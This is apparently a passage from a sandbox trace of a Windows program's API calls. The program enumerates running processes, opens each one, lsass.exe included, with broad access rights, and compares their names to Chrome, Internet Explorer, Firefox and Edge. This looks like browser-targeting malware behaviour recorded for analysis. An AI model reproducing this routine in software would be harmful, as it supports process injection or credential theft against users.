	[0210.514] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0210.515] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x3764
	[0210.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.515] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0210.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.516] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.516] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0210.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.516] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.516] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0210.517] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x3768
	[0210.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.517] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.517] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.518] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.518] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.518] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.519] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x376c
	[0210.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.519] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.519] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.519] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.520] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.520] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.520] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x3770
	[0210.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.521] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.521] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.521] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.522] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.522] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.522] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x3774
	[0210.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.523] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.523] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.523] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.524] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.524] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.524] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x3778
	[0210.524] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.525] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.525] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.525] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.525] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.525] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.526] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.526] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x377c
	[0210.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.526] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.527] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.527] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.527] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.527] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.528] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.528] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x3780
	[0210.528] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.528] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.529] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.529] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.529] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.529] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.529] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.530] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x3784
	[0210.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.530] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.530] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.531] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.531] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.531] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.531] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.531] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0210.532] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x3788
	[0210.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.532] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0210.532] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.532] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.533] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0210.533] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.533] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.533] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.534] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x378c
	[0210.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.534] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.534] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.534] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.535] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.535] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.535] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.535] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0210.536] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x3790
	[0210.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.536] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.536] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.537] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.537] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.537] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0210.538] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x3794
	[0210.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.538] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0210.538] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.538] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.539] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0210.539] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.539] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.539] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0210.540] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x3798
	[0210.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.540] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0210.540] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.540] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.541] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0210.541] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.541] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.541] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0210.542] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x379c
	[0210.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.542] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0210.542] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.542] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0210.543] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.543] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.543] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0210.544] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x37a0
	[0210.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.544] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0210.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.544] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.544] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.544] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0210.545] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.545] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.545] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0210.546] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x37a4
	[0210.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.546] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0210.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.546] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.546] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0210.546] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.546] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.547] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0210.547] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x37a8
	[0210.547] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.547] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0210.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.548] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.548] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0210.548] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.548] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0210.549] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0210.549] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0210.550] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x37ac
	[0210.550] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.550] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0210.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.551] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.551] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.551] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0210.552] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.552] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.552] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0210.553] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x37b0
	[0210.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.553] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0210.553] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.553] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.554] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0210.554] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.554] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.554] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0210.555] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x37b4
	[0210.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.555] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0210.555] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.555] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.556] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0210.556] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.556] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.556] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0210.557] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x37b8
	[0210.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.557] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0210.557] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.557] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.558] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0210.558] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.558] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.558] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0210.559] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x37bc
	[0210.559] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.560] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0210.560] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.560] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.561] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0210.561] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.562] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.562] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0210.563] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x37c0
	[0210.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.563] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0210.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.563] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0210.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.563] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0210.563] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.563] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0210.564] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0210.564] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x37c4
	[0210.564] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0210.564] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
